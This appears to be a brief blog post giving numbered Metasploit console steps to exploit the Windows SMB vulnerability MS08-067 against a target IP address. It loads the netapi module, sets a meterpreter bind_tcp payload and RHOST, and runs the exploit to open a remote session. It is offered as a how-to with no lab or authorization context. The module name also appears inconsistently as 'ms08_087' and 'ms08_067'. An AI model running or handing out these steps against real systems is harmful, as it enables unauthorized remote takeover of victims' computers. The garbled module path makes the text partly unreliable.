1. Open metasploit from backtrack 5
2. wait, until show type "msf>"
3. and then , your type " use windows/smb/ms08_087_netapi"
4. if success , will appear "msf exploit (ms08_067_netapi)"
5. and then, type "set payload windows/meterpreter/bind_tcp"
6. later, type "set RHOST ip adrress computer target" example (set RHOST 192.168.1.3 ) enter then
type exploit, if appear writing meterpreter this is successfully
Tidak ada komentar:
Posting Komentar